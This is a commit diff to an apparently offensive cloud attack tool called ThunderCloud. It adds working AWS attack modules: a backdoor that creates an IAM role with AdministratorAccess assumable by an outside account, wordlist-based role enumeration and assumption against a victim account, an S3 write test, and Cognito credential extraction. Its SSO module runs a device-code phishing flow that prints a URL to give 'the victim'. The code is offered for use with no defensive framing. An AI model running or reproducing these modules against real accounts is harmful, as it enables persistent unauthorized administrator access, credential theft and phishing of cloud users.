STRLCPY/ThunderCloud

■ ■ ■ ■ ■ ■

clouds/aws/assume.py

-

■ ■ ■ ■ ■ ■

clouds/aws/backdoor.py

1	+	import boto3
2	+	import json
3	+	import time
4	+
5	+	class backdoor:
6	+	pass
7	+
8	+	def attack(self, role, key, secret, account_id):
9	+	iam = boto3.client("iam",
10	+	aws_access_key_id= key,
11	+	aws_secret_access_key=secret,
12	+	region_name="us-east-2")
13	+	assume_role_policy_document = json.dumps({
14	+	"Version": "2012-10-17",
15	+	"Statement": [
16	+	{
17	+	"Effect": "Allow",
18	+	"Action": "sts:AssumeRole",
19	+	"Principal": {
20	+	"AWS": account_id
21	+	},
22	+	"Condition": {}
23	+	}
24	+	]
25	+	})
26	+
27	+	response = iam.create_role(
28	+	RoleName=role,
29	+	AssumeRolePolicyDocument=assume_role_policy_document
30	+	)
31	+
32	+	role_name = response["Role"]["RoleName"]
33	+	time.sleep(5)
34	+	response = iam.attach_role_policy(
35	+	RoleName=role_name,
36	+	PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
37	+	)
38	+	print("Backdoor role with Administrator access created - %s" %role_name)
39	+

■ ■ ■ ■ ■ ■

clouds/aws/cognito.py

		skipped 6 lines
7	7		class Cognito:
8	8		pass
9	9
10		-	def attack(self):
11		-	client = boto3.client('cognito-identity', region_name="us-east-2")
12		-
	10	+	def attack(self, ce, region):
	11	+	client = boto3.client('cognito-identity', region_name=region)
13	12		try:
14		-	_id = client.get_id(IdentityPoolId="us-east-2:242fadac-86fa-4afb-9a48-83a546572559")
	13	+	_id = client.get_id(IdentityPoolId=region + ':' + ce)
15	14		except client.exceptions.NotAuthorizedException as e:
16	15		fail_message = "Bla Bla: {}".format(e)
17	16		print(fail_message)
		skipped 7 lines
25	24		session_token = credentials['Credentials']['SessionToken']
26	25		identity_id = credentials['IdentityId']
27	26
28		-	print(access_key, secret_key, session_token)
	27	+	print("Access key - ", access_key)
	28	+	print("Secret key -", secret_key)
	29	+	print("Session token -", session_token)
29	30

■ ■ ■ ■ ■ ■

clouds/aws/enum.py

	1	+	import boto3
	2	+	import botocore
	3	+
	4	+	class EnumRoles:
	5	+	pass
	6	+	def attack(self, account_id, key, secret):
	7	+
	8	+	file = "./wordlist/word_list.txt"
	9	+	with open(file, 'r') as f:
	10	+	word_list = f.read().splitlines()
	11	+
	12	+	client = boto3.client('sts',aws_access_key_id= key,
	13	+	aws_secret_access_key=secret)
	14	+	print("Starting enumeration on account_id %s" %(account_id))
	15	+
	16	+	for word in word_list:
	17	+	role_arn = 'arn:aws:iam::%s:role/%s' %(account_id, word)
	18	+	try:
	19	+	response = client.assume_role(
	20	+	RoleArn=role_arn,
	21	+	RoleSessionName='test',
	22	+	DurationSeconds=43200
	23	+	)
	24	+
	25	+	except botocore.exceptions.ClientError as error:
	26	+	if 'The requested DurationSeconds exceeds the MaxSessionDuration set for this role.' in str(error):
	27	+	response = client.assume_role(
	28	+	RoleArn=role_arn,
	29	+	RoleSessionName='test',
	30	+	DurationSeconds=3600
	31	+	)
	32	+	print("Succesful assumed the role %s" %(role_arn))
	33	+	break
	34	+	elif 'Not authorized to perform sts:AssumeRole' in str(error):
	35	+	pass
	36	+	elif 'is not authorized to perform: sts:AssumeRole on resource' in str(error):
	37	+	print("Found restricted role but not allowed to assume %s" %(role_arn))
1	38

■ ■ ■ ■ ■ ■

clouds/aws/s3.py

	1	+	import boto3
	2	+	class s3bucket:
	3	+	pass
	4	+
	5	+	def attack(self, bucket_name, key, secret):
	6	+	session = boto3.Session(
	7	+	aws_access_key_id=key,
	8	+	aws_secret_access_key=secret,
	9	+	)
	10	+
	11	+	s3 = session.resource('s3')
	12	+
	13	+	object = s3.Object(bucket_name, 'vuln_file_name.txt')
	14	+
	15	+	txt_data = b'This is a test file to check for misconfiguration'
	16	+
	17	+	try:
	18	+	result = object.put(Body=txt_data)
	19	+	res = result.get('ResponseMetadata')
	20	+
	21	+	if res.get('HTTPStatusCode') == 200:
	22	+	print('File Uploaded Successfully')
	23	+	else:
	24	+	print('File Not Uploaded')
	25	+	except:
	26	+	print("Either the bucket does not exist or Access Denied")
1	27

■ ■ ■ ■ ■ ■

clouds/aws/sso.py

		skipped 5 lines
6	6
7	7		class AWSSSO:
8	8		pass
9		-	def attack(self):
10		-	region = "us-east-2"
11		-	url = "https://something.awsapps.com"
	9	+	def attack(self, url, region):
12	10		sso_oidc = boto3.client('sso-oidc', region_name= region)
13	11		client = sso_oidc.register_client(
14		-	client_name = 'thundercloud',
15		-	client_type = 'public'
	12	+	clientName = 'thundercloud',
	13	+	clientType = 'public'
16	14		)
17	15		client_id = client.get('clientId')
18	16		client_secret = client.get('clientSecret')
19	17		authz = sso_oidc.start_device_authorization(
20	18		clientId = client_id,
21		-	client_secret = client_secret,
	19	+	clientSecret = client_secret,
22	20		startUrl = url
23	21		)
24	22		url = authz.get('verificationUriComplete')
25	23		deviceCode = authz.get('deviceCode')
26	24		print(client_id, client_secret, deviceCode)
27		-	print("Give this URL to the victim" + url)
	25	+	print("Give this URL to the victim\n" + url)
	26	+

■ ■ ■ ■ ■ ■

tc.py

		skipped 1 lines
2	2
3	3		def main():
4	4		"""Main function"""
	5	+	print('''
	6	+	_______ _ _ _____ _ _
	7	+	\|__ __\| \| \| \| / ____\| \| \| \|
	8	+	\| \| \| \|__ _ _ _ __ __\| \| ___ _ __\| \| \| \| ___ _ _ __\| \|
	9	+	\| \| \| '_ \\| \| \| \| '_ \ / _` \|/ _ \ '__\| \| \| \|/ _ \\| \| \| \|/ _` \|
	10	+	\| \| \| \| \| \| \|_\| \| \| \| \| (_\| \| __/ \| \| \|____\| \| (_) \| \|_\| \| (_\| \|
	11	+	\_/ \|_\| \|_\|\__,_\|_\| \|_\|\__,_\|\___\|_\| \_____\|_\|\___/ \__,_\|\__,_\|
	12	+
	13	+	''')
5	14		parser = argparse.ArgumentParser(description='Attack modules of cloud AWS')
6	15		parser.add_argument('-ce', '--cognito_endpoint', help='to verify if cognito endpoint is vulnerable '
7	16		'and to extract credentials')
	17	+	parser.add_argument('-reg', '--region',help='AWS region of the resource')
	18	+	parser.add_argument('-accid', '--aws_account_id', help='AWS account of the victim')
	19	+	parser.add_argument('-aws_key', '--aws_access_key', help= 'AWS access keys of the victim account')
	20	+	parser.add_argument('-aws_secret', '--aws_secret_key', help='AWS secret key of the victim account')
	21	+	parser.add_argument('-bdrole', '--backdoor_role', help='Name of the backdoor role in victim role')
8	22		parser.add_argument('-sso', '--sso_url', help='AWS SSO URL to phish for AWS credentials')
9		-	parser.add_argument('-enum-roles', '--enumerate_roles', help='To enumerate account roles in victim AWS roles')
10		-	parser.add_argument('-s3', '--s3_bucket_name', help='Execute 7 attacks on S3 bucket')
11		-	parser.add_argument('-asum_role', '--assume_role', help='Privilege escalation for assuming roles')
	23	+	parser.add_argument('-enum_roles', '--enumerate_roles', help='To enumerate and assume account roles in victim AWS roles')
	24	+	parser.add_argument('-s3', '--s3_bucket_name', help='Execute upload attack on S3 bucket')
12	25		parser.add_argument('-conn_string', '--connection_string', help='Azure Shared Access key for reading'
13	26		'servicebus/queues/blobs etc')
14	27		parser.add_argument('-blob', '--blob', help='Azure blob enumeration')
15		-	parser.add_argument()
	28	+	parser.add_argument('-shared_access_key', '--shared_access_key', help='Azure shared key')
16	29		args = parser.parse_args()
17	30		if args.cognito_endpoint:
18	31		from clouds.aws.cognito import Cognito
19	32		attack_cognito = Cognito()
20		-	attack_cognito.attack()
	33	+	attack_cognito.attack(args.cognito_endpoint, args.region)
21	34		elif args.sso_url:
22	35		from clouds.aws.sso import AWSSSO
23	36		attack_sso = AWSSSO()
24		-	attack_sso.attack()
	37	+	attack_sso.attack(args.sso_url, args.region)
25	38		elif args.enumerate_roles:
26	39		from clouds.aws.enum import EnumRoles
27	40		attack_roles = EnumRoles()
28		-	attack_roles.attack()
	41	+	attack_roles.attack(args.enumerate_roles, args.aws_access_key, args.aws_secret_key)
29	42		elif args.s3_bucket_name:
30		-	from clouds.aws.s3 import S3
31		-	attack_s3 = S3()
32		-	attack_s3.attack()
33		-	elif args.assume_role:
34		-	from clouds.aws.assume import AsumRole
35		-	attack_roles = AsumRole()
36		-	attack_roles.attack()
37		-	elif args.shared_access_key:
38		-	from clouds.azure.keys import ConnectionString
39		-	attack_keys = ConnectionString()
40		-	attack_keys.attack()
	43	+	from clouds.aws.s3 import s3bucket
	44	+	attack_s3 = s3bucket()
	45	+	attack_s3.attack(args.s3_bucket_name, args.aws_access_key, args.aws_secret_key)
	46	+	elif args.backdoor_role:
	47	+	from clouds.aws.iambackdoor import backdoor
	48	+	attack_role = backdoor()
	49	+	attack_role.attack(args.backdoor_role, args.aws_access_key, args.aws_secret_key, args.aws_account_id)
41	50		elif args.blob:
42	51		from clouds.azure.blob import Blob
43	52		attack_blob = Blob()
		skipped 7 lines

■ ■ ■ ■ ■ ■

wordlist/word_list.txt

1	+	AdminAccess
2	+	sysadministrator
3	+	systemadmin
4	+	systemadministrator
5	+	devops
6	+	systemsmanager
7	+	server
8	+	service
9	+	networkadmin
10	+	networkadministrator
11	+

updates